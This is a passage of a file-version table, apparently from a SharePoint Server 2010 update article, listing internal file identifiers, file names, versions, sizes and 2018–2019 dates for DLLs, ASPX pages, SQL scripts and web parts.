\nmmsmafim.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| mmsmafim.dll| 4.0.2450.49| 84,576| 11-Sep-2018| 06:22 \nmmsmaip.dll.amd64.0a1ff8f6_2a7a_48ff_97ed_015dafad8e34| mmsmaip.dll| 4.0.2450.49| 529,504| 11-Sep-2018| 06:22 \nmmsmaxml.dll.amd64.1843e542_3f71_4852_a7b7_3b6c9eb5862b| mmsmaxml.dll| 4.0.2450.49| 427,616| 11-Sep-2018| 06:22 \nmmsperf.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsperf.dll| 4.0.2450.49| 23,648| 11-Sep-2018| 06:22 \nmmsperf.h.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsperf.h| | 915| 07-Sep-2018| 04:39 \nmmsperf.ini.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsperf.ini| | 1,228| 07-Sep-2018| 04:39 \nmmsps.dll.amd64.a6879a20_2b96_4c71_991d_33c78ca00320| mmsps.dll| 4.0.2450.49| 178,264| 11-Sep-2018| 06:22 \nmmsscpth.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsscpth.dll| 4.0.2450.49| 3,052,128| 11-Sep-2018| 06:22 \nmmsscrpt.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsscrpt.exe| 4.0.2450.49| 164,960| 11-Sep-2018| 06:22 \nmmsscrpt.exe.config.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsscrpt.exe.config| | 2,406| 07-Sep-2018| 04:39 \nmmsserverrcw.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mmsserverrcw.dll| 4.0.2450.49| 39,528| 11-Sep-2018| 06:22 \nmmsuihlp.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mmsuihlp.dll| 4.0.2450.49| 953,952| 11-Sep-2018| 06:22 \nmmsuishell.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mmsuishell.dll| 4.0.2450.49| 199,272| 11-Sep-2018| 06:22 \nmmsutils.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsutils.dll| 4.0.2450.49| 231,008| 11-Sep-2018| 06:22 \nmmswmi.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmswmi.dll| 4.0.2450.49| 150,624| 11-Sep-2018| 06:22 \nmmswmi.mof.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmswmi.mof| | 8,536| 07-Sep-2018| 04:39 \nmmswmix.mof.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmswmi-x.mof| | 978| 07-Sep-2018| 04:39 \nmngctpub.apx| managectpublishing.aspx| | 5,453| 11-Sep-2018| 07:14 \nmngfedl.apx| managefederatedlocations.aspx| | 15,986| 07-Sep-2018| 05:12 \nmngrules.apx| managecrawlrules.aspx| | 9,937| 07-Sep-2018| 05:12 \nmngshr.apx| managesitehitrules.aspx| | 6,352| 07-Sep-2018| 05:12 \nmngtypes.apx| managefiletypes.aspx| | 12,233| 07-Sep-2018| 05:12 \nmobileresults_spx| mobileresults.aspx| | 3,008| 07-Sep-2018| 05:12 \nmobilesearch_spx| mobilesearch.aspx| | 3,006| 07-Sep-2018| 05:12 \nmodwrkflip.aspx| modwrkflip.aspx| | 2,335| 11-Sep-2018| 03:11 \nmprop.apx| managedproperty.aspx| | 23,621| 07-Sep-2018| 05:12 \nmsdym7.dll_osssearch| msdym7.dll| 14.0.7005.1000| 2,593,344| 11-Sep-2018| 07:00 \nmsdym7.lex_osssearch| msdym7.lex| 14.0.7140.5000| 425,472| 11-Sep-2018| 07:00 \nmsft.metads.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.dll| 4.0.2450.49| 14,480| 11-Sep-2018| 06:22 \nmsft.metads.host.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.host.dll| 4.0.0.0| 12,440| 11-Sep-2018| 06:22 \nmsft.metads.host.gac.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.host.dll| 4.0.0.0| 12,440| 11-Sep-2018| 06:22 \nmsft.metads.impl.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.impl.dll| 4.0.2450.49| 84,632| 11-Sep-2018| 06:22 \nmsft.metads.xml.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservices.xml| | 156| 07-Sep-2018| 04:39 \nmsft.metadsex.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservicesex.dll| 4.0.0.0| 60,048| 11-Sep-2018| 06:22 \nmsft.metadsex.xml.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.metadirectoryservicesex.xml| | 265,937| 07-Sep-2018| 04:39 \nmsitedefault.aspx| default.aspx| | 3,768| 07-Sep-2018| 05:17 \nmsitehostcontent.aspx| personcontent.aspx| | 10,439| 07-Sep-2018| 05:17 \nmsitehostdefault.aspx| default.aspx| | 3,871| 07-Sep-2018| 05:17 \nmsitehostdiscussion.aspx| discussion.aspx| | 2,992| 07-Sep-2018| 05:17 \nmsitehostorgview.aspx| organizationview.aspx| | 8,916| 07-Sep-2018| 05:17 \nmsitehostperson.aspx| person.aspx| | 10,207| 07-Sep-2018| 05:17 \nmsitehosttagp.aspx| tagprofile.aspx| | 3,771| 07-Sep-2018| 05:17 \nmsitehostxmlonet_xml| onet.xml| | 17,265| 07-Sep-2018| 05:17 \nmsitepublic.aspx| public.aspx| | 1,974| 07-Sep-2018| 05:17 \nmsscpi.dll| msscpi.dll| 14.0.7167.5000| 2,153,192| 11-Sep-2018| 07:39 \nmssdmn.exe| mssdmn.exe| 14.0.7005.1000| 791,144| 11-Sep-2018| 07:39 \nmssearch.exe| mssearch.exe| 14.0.7005.1000| 524,888| 11-Sep-2018| 07:39 \nmsslad.dll| msslad.dll| 14.0.7005.1000| 432,232| 11-Sep-2018| 07:39 \nmssph.dll| mssph.dll| 14.0.7121.5000| 1,678,520| 11-Sep-2018| 07:39 \nmssrch.dll| mssrch.dll| 14.0.7006.1000| 4,988,520| 11-Sep-2018| 07:39 \nmsswelcm.apx| msswelcome.aspx| | 8,700| 07-Sep-2018| 05:12 \nmstlay_mysite.master| mysite.master| | 22,685| 07-Sep-2018| 05:17 \nmstr4tsc.dll| mstr4tsc.dll| 14.0.7005.1000| 107,600| 11-Sep-2018| 05:42 \nmsvcm90.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| msvcm90.dll| 9.00.21022.8| 245,248| 07-Sep-2018| 04:39 \nmsvcp90.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| msvcp90.dll| 9.00.21022.8| 851,456| 07-Sep-2018| 04:39 \nmsvcr90.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| msvcr90.dll| 9.00.21022.8| 627,200| 07-Sep-2018| 04:39 \nmswb7.dll_osssearch| mswb7.dll| 14.0.7005.1000| 332,424| 11-Sep-2018| 07:01 \nmswb70011.dll_osssearch| mswb70011.dll| 14.0.7005.1000| 1,092,752| 11-Sep-2018| 07:01 \nmswb7001e.dll_osssearch| mswb7001e.dll| 14.0.7005.1000| 1,092,752| 11-Sep-2018| 07:01 \nmswb70404.dll_osssearch| mswb70404.dll| 14.0.7005.1000| 1,092,736| 11-Sep-2018| 07:01 \nmswb70804.dll_osssearch| mswb70804.dll| 14.0.7005.1000| 1,092,736| 11-Sep-2018| 07:01 \nmultilangtemplates.ascx| transmgmtlibtemplates.ascx| | 3,243| 11-Sep-2018| 03:11 \nmv.dsml.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mv.dsml| | 42,567| 07-Sep-2018| 04:39 \nmvdesigner.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mvdesigner.dll| 4.0.2450.49| 166,504| 11-Sep-2018| 06:22 \nmvviewer.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mvviewer.dll| 4.0.2450.49| 100,960| 11-Sep-2018| 06:22 \nmycontactlinks.aspx| mycontactlinks.aspx| | 9,101| 07-Sep-2018| 05:17 \nmydwpactivitytracker_dwp| activitytracker.dwp| | 560| 07-Sep-2018| 05:17 \nmydwpaskmeabout_dwp| askmeabout.dwp| | 539| 07-Sep-2018| 05:17 \nmydwpcontactlinks_dwp| contactlinks.dwp| | 556| 07-Sep-2018| 05:17 \nmydwpmembershipdocs_dwp| membershipdocs.dwp| | 802| 07-Sep-2018| 05:17 \nmydwpmemberships_dwp| memberships.dwp| | 833| 07-Sep-2018| 05:17 \nmydwpmydocs_dwp| mydocs.dwp| | 757| 07-Sep-2018| 05:17 \nmydwpmypics_dwp| mypics.dwp| | 638| 07-Sep-2018| 05:17 \nmydwpmyworks_dwp| myworks.dwp| | 533| 07-Sep-2018| 05:17 \nmydwpowacalendar_dwp| owacalendar.dwp| | 534| 07-Sep-2018| 05:17 \nmydwpowacontacts_dwp| owacontacts.dwp| | 534| 07-Sep-2018| 05:17 \nmydwpowainbox_dwp| owainbox.dwp| | 550| 07-Sep-2018| 05:17 \nmydwpowatasks_dwp| owatasks.dwp| | 525| 07-Sep-2018| 05:17 \nmydwpowa_dwp| owa.dwp| | 510| 07-Sep-2018| 05:17 \nmydwpquicklinks_dwp| quicklinks.dwp| | 526| 07-Sep-2018| 05:17 \nmydwpsiteframer_dwp| siteframer.dwp| | 909| 07-Sep-2018| 05:17 \nmydwpsocialcomment_dwp| socialcomment.dwp| | 579| 07-Sep-2018| 05:17 \nmydwptagcloud_dwp| tagcloud.dwp| | 562| 07-Sep-2018| 05:17 \nmydwpwelcomewebpart_dwp| welcomewebpart.dwp| | 613| 07-Sep-2018| 05:17 \nmyinfo.aspx| myinfo.aspx| | 1,500| 07-Sep-2018| 05:17 \nmylinks_ascx| mylinks.ascx| | 1,401| 07-Sep-2018| 05:17 \nmymemberships.aspx| mymemberships.aspx| | 8,926| 07-Sep-2018| 05:17 \nmyquicklinks.aspx| myquicklinks.aspx| | 2,791| 07-Sep-2018| 05:17 \nmysite.aspx| mysite.aspx| | 4,659| 07-Sep-2018| 05:17 \nmysiteheader.aspx| mysiteheader.aspx| | 1,122| 07-Sep-2018| 05:17 \nmysitexmlonet_xml| onet.xml| | 13,569| 07-Sep-2018| 05:17 \nmystlink_ascx| mysitelink.ascx| | 1,379| 07-Sep-2018| 05:17 \nmystmbl_ascx| mysitemobile.ascx| | 9,731| 07-Sep-2018| 05:17 \nmystredr_ascx| mysiteredirection.ascx| | 254| 07-Sep-2018| 05:17 \nmytopnav_ascx| mysitetopnavigation.ascx| | 5,230| 07-Sep-2018| 05:17 \nnatlang6.dll_osssearch| naturallanguage6.dll| 14.0.7132.5000| 1,495,248| 11-Sep-2018| 07:01 \nnewdocset.aspx| newdocset.aspx| | 3,250| 11-Sep-2018| 03:11 \nnewffast_aspx| newform.aspx| | 18,531| 07-Sep-2018| 05:17 \nnewform.asx_xlatelist| newform.aspx| | 14,048| 11-Sep-2018| 03:11 \nnewmultilang.aspx| newtranslationmanagement.aspx| | 63,501| 11-Sep-2018| 03:11 \nnewprofserviceappcreated.aspx| newprofileserviceapplicationcreated.aspx| | 2,613| 07-Sep-2018| 05:17 \nnewprofserviceappsettings.aspx| newprofileserviceapplicationsettings.aspx| | 12,674| 07-Sep-2018| 05:17 \nnewsv3artc2.aspx| article2.aspx| | 286| 07-Sep-2018| 05:17 \nnewsv3home.aspx| default.aspx| | 286| 07-Sep-2018| 05:17 \nnewsv3xmlonet_xml| onet.xml| | 8,711| 07-Sep-2018| 05:17 \nnewvarst.asx| newvariationsite.aspx| | 10,576| 07-Sep-2018| 12:41 \nnewxlrpt.aspx| createworkbook.aspx| | 8,961| 07-Sep-2018| 05:17 \nnhomev3art.aspx| article1.aspx| | 286| 07-Sep-2018| 05:17 \nnhomev3home.aspx| default.aspx| | 286| 07-Sep-2018| 05:17 \nnhomev3xmlonet_xml| onet.xml| | 26,154| 07-Sep-2018| 05:17 \nnocrwl.asx| nocrawlsettings.aspx| | 8,252| 07-Sep-2018| 12:41 \nnotesmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| notesmapropertypages.dll| 4.0.2450.49| 121,464| 11-Sep-2018| 06:22 \nnotessiset.apx| notesserviceinstancesettings.aspx| | 5,346| 07-Sep-2018| 05:12 \nnoteswebservice.dll.oss| noteswebservice.dll| 14.0.7005.1000| 972,888| 11-Sep-2018| 07:39 \nntma.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntma.dll| 4.0.2450.49| 55,896| 11-Sep-2018| 06:22 \nntmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmaattributeinclusionlist.xml| | 187| 07-Sep-2018| 04:39 \nntmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmamandatoryattributelist.xml| | 53| 07-Sep-2018| 04:39 \nntmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmamandatoryobjectclasslist.xml| | 39| 07-Sep-2018| 04:39 \nntmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntmaobjectclassinclusionlist.xml| | 122| 07-Sep-2018| 04:39 \nntuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ntuisettinginit.xml| | 591| 07-Sep-2018| 04:39 \nnwsarch.aspx| newsarchive.aspx| | 2,725| 07-Sep-2018| 05:17 \nobjectlauncher.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| objectlauncher.dll| 4.0.2450.49| 12,912| 11-Sep-2018| 06:22 \nobjectschemaconfigpopulate.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objectschemaconfigpopulate.sql| | 110,847| 07-Sep-2018| 04:39 \nobjectschema_storedprocedures.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objectschema_storedprocedures.sql| | 77,710| 11-Sep-2018| 06:22 \nobjects_indexes.unfiltered.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_indexes.unfiltered.sql| | 1,055| 07-Sep-2018| 04:39 \nobjects_storedprocedures.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_storedprocedures.moss.sql|objects_storedprocedures.sql| | 386,449| 11-Sep-2018| 06:22 \nobjects_tables.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_tables.sql| | 48,474| 07-Sep-2018| 04:39 \nobjects_views.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| objects_views.sql| | 21,219| 07-Sep-2018| 04:39 \nobjectviewers.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| objectviewers.dll| 4.0.2450.49| 207,464| 11-Sep-2018| 06:22 \nocset.asx| objectcachesettings.aspx| | 11,348| 07-Sep-2018| 12:41 \nodc3232.png| | | 469| 11-Sep-2018| 02:53 \nodcw2020.png| | | 325| 11-Sep-2018| 02:53 \noffice.odf| office.odf| 14.0.7226.5000| 4,310,296| 12-Feb-2019| 06:08 \nofficialfiledisco.aspx| officialfiledisco.aspx| | 1,422| 11-Sep-2018| 03:11 \nofficialfilewsdl.aspx| officialfilewsdl.aspx| | 13,606| 11-Sep-2018| 03:11 \noffxml.dll| offxml.dll| 14.0.7011.1000| 516,264| 11-Sep-2018| 08:11 \nolapfilter_dwp| olapfilter.dwp| | 621| 07-Sep-2018| 05:17 \noperations.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| operations.dll| 4.0.2450.49| 76,392| 11-Sep-2018| 06:22 \norgadminedit.aspx| orgadminedit.aspx| | 2,550| 07-Sep-2018| 05:17 \norgnew.aspx| orgnew.aspx| | 2,573| 07-Sep-2018| 05:17 \nosafehtm.dll| osafehtm.dll| 14.0.7104.5000| 156,344| 11-Sep-2018| 07:55 \nosrvadm.rsx| officeserveradmin.resx| | 12,878| 11-Sep-2018| 07:14 \nosrvadml.xml| officeserveradminlinks.xml| | 1,505| 11-Sep-2018| 07:14 \nosrvcore.rsx| osrvcore.resx| | 15,662| 11-Sep-2018| 07:14 \nosrvintl.dll| microsoft.office.server.intl.dll| 14.0.7002.1000| 236,192| 11-Sep-2018| 07:14 \noss.cswp.sts_dwp| contentsourcesstatus.dwp| | 671| 07-Sep-2018| 05:12 \noss.dwpadvancedsearchbox_dwp| advancedsearchbox.dwp| | 2,798| 07-Sep-2018| 05:12 \noss.dwpcoreresults_dwp| searchcoreresults.webpart| | 1,564| 07-Sep-2018| 05:12 \noss.dwpdualchinesesearch_dwp| dualchinesesearch.dwp| | 1,501| 07-Sep-2018| 05:12 \noss.dwppeoplecoreresults_dwp| peoplesearchcoreresults.webpart| | 1,156| 07-Sep-2018| 05:12 \noss.dwpsearchbox_dwp| searchbox.dwp| | 1,230| 07-Sep-2018| 05:12 \noss.dwpsearchpaging_dwp| searchpaging.dwp| | 767| 07-Sep-2018| 05:12 \noss.dwpsearchstats_dwp| searchstats.dwp| | 626| 07-Sep-2018| 05:12 \noss.dwpsearchsummary_dwp| searchsummary.dwp| | 632| 07-Sep-2018| 05:12 \noss.farm1.sys_dwp| farmsystemstatus.dwp| | 659| 07-Sep-2018| 05:12 \noss.farmsa.lst_dwp| farmsearchapplications.dwp| | 680| 07-Sep-2018| 05:12 \noss.health.crawlprocessingperactivity.aspx| crawlprocessingperactivity.aspx| | 7,390| 07-Sep-2018| 05:12 \noss.health.crawlprocessingpercomponent.aspx| crawlprocessingpercomponent.aspx| | 10,732| 07-Sep-2018| 05:12 \noss.health.crawlqueue.aspx| crawlqueue.aspx| | 4,689| 07-Sep-2018| 05:12 \noss.health.crawlratepercontentsource.aspx| crawlratepercontentsource.aspx| | 5,782| 07-Sep-2018| 05:12 \noss.health.crawlratepertype.aspx| crawlratepertype.aspx| | 8,895| 07-Sep-2018| 05:12 \noss.health.querylatency.aspx| querylatency.aspx| | 5,500| 07-Sep-2018| 05:12 \noss.health.querylatencytrend.aspx| querylatencytrend.aspx| | 6,335| 07-Sep-2018| 05:12 \noss.health.sharepointbackendquerylatency.aspx| sharepointbackendquerylatency.aspx| | 7,595| 07-Sep-2018| 05:12 \noss.peoplerefinement_dwp| peoplerefinement.webpart| | 1,008| 07-Sep-2018| 05:12 \noss.querysuggestions_dwp| querysuggestions.webpart| | 1,226| 07-Sep-2018| 05:12 \noss.refinement_dwp| refinement.webpart| | 990| 07-Sep-2018| 05:12 \noss.sa1.sys_dwp| searchappsystemstatus.dwp| | 664| 07-Sep-2018| 05:12 \noss.searchactionlinks_dwp| searchactionlinks.webpart| | 1,212| 07-Sep-2018| 05:12 \noss.searchbestbets_dwp| searchbestbets.webpart| | 1,345| 07-Sep-2018| 05:12 \noss.searchresults_aspx| osssearchresults.aspx| | 9,846| 11-Sep-2018| 07:39 \noss.shcuts.sys_dwp| searchappshortcutslist.dwp| | 699| 07-Sep-2018| 05:12 \noss.srchconnectorgenerator_aspx| srchconnectorgenerator.aspx| | 277| 07-Sep-2018| 05:12 \noss.srchrss_aspx| srchrss.aspx| | 2,334| 07-Sep-2018| 05:12 \noss.stplg1_dwp| searchtopology.dwp| | 645| 07-Sep-2018| 05:12 \noss.summaryresults_dwp| summaryresults.webpart| | 1,304| 07-Sep-2018| 05:12 \noss.swpf.advancedsearchbox_dwp| advancedsearchbox.dwp| | 2,798| 07-Sep-2018| 05:12 \noss.swpf.coreresults_dwp| searchcoreresults.webpart| | 1,564| 07-Sep-2018| 05:12 \noss.swpf.dualchinese_search_dwp| dualchinesesearch.dwp| | 1,501| 07-Sep-2018| 05:12 \noss.swpf.peoplecoreresults_dwp| peoplesearchcoreresults.webpart| | 1,156| 07-Sep-2018| 05:12 \noss.swpf.peoplerefinement_dwp| peoplerefinement.webpart| | 1,008| 07-Sep-2018| 05:12 \noss.swpf.querysuggestions_dwp| querysuggestions.webpart| | 1,226| 07-Sep-2018| 05:12 \noss.swpf.refinement_dwp| refinement.webpart| | 990| 07-Sep-2018| 05:12 \noss.swpf.searchactionlinks_dwp| searchactionlinks.webpart| | 1,212| 07-Sep-2018| 05:12 \noss.swpf.searchbestbets_dwp| searchbestbets.webpart| | 1,345| 07-Sep-2018| 05:12 \noss.swpf.searchbox_dwp| searchbox.dwp| | 1,230| 07-Sep-2018| 05:12 \noss.swpf.searchpaging_dwp| searchpaging.dwp| | 767| 07-Sep-2018| 05:12 \noss.swpf.searchstats_dwp| searchstats.dwp| | 626| 07-Sep-2018| 05:12 \noss.swpf.searchsummary_dwp| searchsummary.dwp| | 632| 07-Sep-2018| 05:12 \noss.swpf.summaryresults_dwp| summaryresults.webpart| | 1,304| 07-Sep-2018| 05:12 \noss.swpf.topanswer_dwp| topanswer.webpart| | 1,062| 07-Sep-2018| 05:12 \noss.tcscsearchresults_aspx| tcscsearchresults.aspx| | 34,468| 11-Sep-2018| 07:39 \noss.topanswer_dwp| topanswer.webpart| | 1,062| 07-Sep-2018| 05:12 \noss.webconfig.spss.xml| webconfig.spss.xml| | 9,813| 07-Sep-2018| 05:12 \npackagegeneration.aspx| packagegeneration.aspx| | 2,348| 07-Sep-2018| 04:31 \npageset.asx| pagesettings.aspx| | 26,881| 07-Sep-2018| 12:41 \npblyprovfile.xml| provisionedfiles.xml| | 10,455| 11-Sep-2018| 03:06 \npblyprovfile2.xml| provisionedfiles2.xml| | 2,434| 11-Sep-2018| 03:06 \npblyprovfile3.xml| provisionedfiles3.xml| | 443| 11-Sep-2018| 03:06 \npblyprovfile4.xml| provisionedfiles4.xml| | 304| 11-Sep-2018| 03:06 \npblyprovfile5.xml| provisionedfiles5.xml| | 384| 11-Sep-2018| 03:06 \npblyprovui.xml| provisionedui.xml| | 37,202| 11-Sep-2018| 03:06 \npdefaspx.xml| default.aspx| | 284| 07-Sep-2018| 12:41 \npeoplemosaic.aspx| peoplemosaic.aspx| | 2,639| 07-Sep-2018| 05:17 \npeople_aspx| people.aspx| | 286| 07-Sep-2018| 05:12 \npepfast_aspx| people.aspx| | 286| 07-Sep-2018| 05:12 \npepresults_aspx| peopleresults.aspx| | 284| 07-Sep-2018| 05:12 \npeprfast_aspx| peopleresults.aspx| | 284| 07-Sep-2018| 05:12 \nperson.asx_mobile| person.aspx| | 4,263| 07-Sep-2018| 05:17 \npersonaldefault.aspx| default.aspx| | 3,882| 07-Sep-2018| 05:17 \npersonalsites.aspx| personalsites.aspx| | 15,409| 07-Sep-2018| 05:17 \npersonalxmlonet_xml| onet.xml| | 9,836| 07-Sep-2018| 05:17 \npgfromdc.asx| pagefromdoclayout.aspx| | 6,711| 07-Sep-2018| 12:41 \npgvrinfo.asx| pageversioninfo.aspx| | 3,642| 07-Sep-2018| 12:41 \npkmexsph.dll_0001| pkmexsph.dll| 14.0.7005.1000| 574,040| 11-Sep-2018| 07:39 \nplrptcfg.asx| policyrptconfig.aspx| | 14,603| 11-Sep-2018| 03:11 \npltmplat.apx| pagelayouttemplate.aspx| | 1,270| 07-Sep-2018| 12:41 \npnstset.xml| navigationsitesettings.xml| | 2,941| 11-Sep-2018| 03:06 \npoliccts.aspx| policycts.aspx| | 12,028| 11-Sep-2018| 03:11 \npolicy.aspx| policy.aspx| | 9,048| 11-Sep-2018| 03:11 \npolicyconfig.aspx| policyconfig.aspx| | 10,146| 11-Sep-2018| 03:11 \npolicyfeatures.aspx| policyfeatures.aspx| | 4,824| 11-Sep-2018| 03:11 \npolicylist.aspx| policylist.aspx| | 6,222| 11-Sep-2018| 03:11 \npopupselector1.aspx| popupselector.aspx| | 9,606| 07-Sep-2018| 05:12 \nportal.dll| microsoft.sharepoint.portal.dll| 14.0.7231.5000| 5,021,360| 26-Feb-2019| 04:07 \nportal.dll_001| microsoft.sharepoint.portal.dll| 14.0.7231.5000| 5,021,360| 26-Feb-2019| 04:07 \nportal.js| portal.js| | 23,261| 11-Sep-2018| 07:47 \nportalapi.aspx| portalapi.aspx| | 1,355| 07-Sep-2018| 05:17 \nportaluiconfigurations.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| portaluiconfigurations.sql| | 24,857| 11-Sep-2018| 06:22 \npositionselector.ascx_1048638289| positionselector.ascx| | 1,875| 07-Sep-2018| 04:32 \nppldefault_aspx| people.aspx| | 16,945| 07-Sep-2018| 05:12 \npplresults_aspx| peopleresults.aspx| | 23,276| 07-Sep-2018| 05:12 \npplsearchres.aspx| peoplesearchresults.aspx| | 27,958| 07-Sep-2018| 05:12 \npreview.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| preview.dll| 4.0.2450.49| 318,048| 11-Sep-2018| 06:22 \nprm0006.bin_osssearch| prm0006.bin| 14.0.7104.5000| 7,062,016| 11-Sep-2018| 07:01 \nprm0007.bin_osssearch| prm0007.bin| 14.0.7135.5000| 11,625,984| 11-Sep-2018| 07:01 \nprm0009.bin_osssearch| prm0009.bin| 14.0.7157.5000| 6,131,200| 11-Sep-2018| 07:01 \nprm0013.bin_osssearch| prm0013.bin| 14.0.7153.5000| 9,650,688| 11-Sep-2018| 07:01 \nprm0015.bin_osssearch| prm0015.bin| 14.0.7153.5000| 8,056,320| 11-Sep-2018| 07:01 \nprm0019.bin_osssearch| prm0019.bin| 14.0.7140.5000| 8,751,104| 11-Sep-2018| 07:01 \nprofadminedit.aspx| profadminedit.aspx| | 2,554| 07-Sep-2018| 05:17 \nprofilebrowser_dwp| profilebrowser.dwp| | 644| 07-Sep-2018| 05:17 \nprofileimportexportservicedisco.aspx| profileimportexportservicedisco.aspx| | 1,046| 07-Sep-2018| 05:17 \nprofileimportexportservicewsdl.aspx| profileimportexportservicewsdl.aspx| | 23,058| 07-Sep-2018| 05:17 \nprofileredirect.aspx| profileredirect.aspx| | 1,429| 07-Sep-2018| 05:17 \nprofilesrp.sql| profilesrp.sql| | 1,114,429| 11-Sep-2018| 07:47 \nprofilesxmlonet_xml| onet.xml| | 7,028| 07-Sep-2018| 05:17 \nprofilesyncprovision.aspx| profilesynchronizationserviceprovisionpage.aspx| | 5,785| 07-Sep-2018| 05:17 \nprofilup.sql| profilup.sql| | 864,691| 11-Sep-2018| 07:47 \nprofmngr.aspx| profmngr.aspx| | 3,378| 07-Sep-2018| 05:17 \nprofnew.aspx| profnew.aspx| | 2,574| 07-Sep-2018| 05:17 \nproftemp.asx| businessdataprofiletemplate.aspx| | 4,513| 07-Sep-2018| 04:31 \nprojpg.apx| projectpage.aspx| | 6,182| 07-Sep-2018| 12:41 \nproperties3d.ascx_1048638289| properties3d.ascx| | 4,752| 07-Sep-2018| 04:32 \npropertiesadvanced.ascx_2060739507| propertiesadvanced.ascx| | 4,811| 07-Sep-2018| 04:32 \npropertiesadvanced.aspx_2060739507| propertiesadvanced.aspx| | 7,951| 07-Sep-2018| 04:32 \npropertiesaxis.ascx_1048638289| propertiesaxis.ascx| | 11,231| 07-Sep-2018| 04:32 \npropertiesbackground.ascx_1048638289| propertiesbackground.ascx| | 2,358| 07-Sep-2018| 04:32 \npropertiesdatalabel.ascx_1048638289| propertiesdatalabel.ascx| | 4,703| 07-Sep-2018| 04:32 \npropertiesdatamarker.ascx_1048638289| propertiesdatamarker.ascx| | 2,507| 07-Sep-2018| 04:32 \npropertiesinteractivityseries.ascx_1048638289| propertiesinteractivityseries.ascx| | 3,917| 07-Sep-2018| 04:32 \npropertieslegend.ascx_1048638289| propertieslegend.ascx| | 5,466| 07-Sep-2018| 04:32 \npropertiessizetype.ascx_1048638289| propertiessizetype.ascx| | 2,374| 07-Sep-2018| 04:32 \npropertiestheme.ascx_1048638289| propertiestheme.ascx| | 2,317| 07-Sep-2018| 04:32 \npropertiestitle.ascx_1048638289| propertiestitle.ascx| | 2,896| 07-Sep-2018| 04:32 \npropertypageconfig.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| propertypageconfig.xml| | 11,223| 07-Sep-2018| 04:39 \npropertysheetbase.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| propertysheetbase.dll| 4.0.2450.49| 416,368| 11-Sep-2018| 06:22 \nprov.xml| provisionedfiles.xml| | 1,180| 11-Sep-2018| 03:06 \nprov2.xml| provisionedfiles2.xml| | 1,196| 11-Sep-2018| 03:06 \nprovfile.xml| provisionedfiles.xml| | 4,738| 11-Sep-2018| 03:06 \nprovfl2.xml| provisionedfiles2.xml| | 511| 11-Sep-2018| 03:06 \nprovfl3.xml| provisionedfiles3.xml| | 704| 11-Sep-2018| 03:06 \nprovui.xml| provisionedui.xml| | 22,575| 11-Sep-2018| 03:06 \nproxy.aspx| proxy.aspx| | 492| 07-Sep-2018| 05:17 \npshdnft.asx| enablefeatures.aspx| | 6,358| 07-Sep-2018| 05:17 \npshdnst.asx| enablingfeatures.aspx| | 6,597| 07-Sep-2018| 05:17 \npsite_mysite.master| mysite.master| | 22,685| 07-Sep-2018| 05:17 \npubacmnu.asx| publishingactionmenu.ascx| | 4,805| 07-Sep-2018| 12:41 \npubconsl.asx| publishingconsole.ascx| | 11,476| 07-Sep-2018| 12:41 \npublctt.xml| publishedlinkscontenttypes.xml| | 947| 11-Sep-2018| 03:06 \npublishedlinksservicedisco.aspx| publishedlinksservicedisco.aspx| | 1,036| 07-Sep-2018| 04:57 \npublishedlinksservicewsdl.aspx| publishedlinksservicewsdl.aspx| | 4,407| 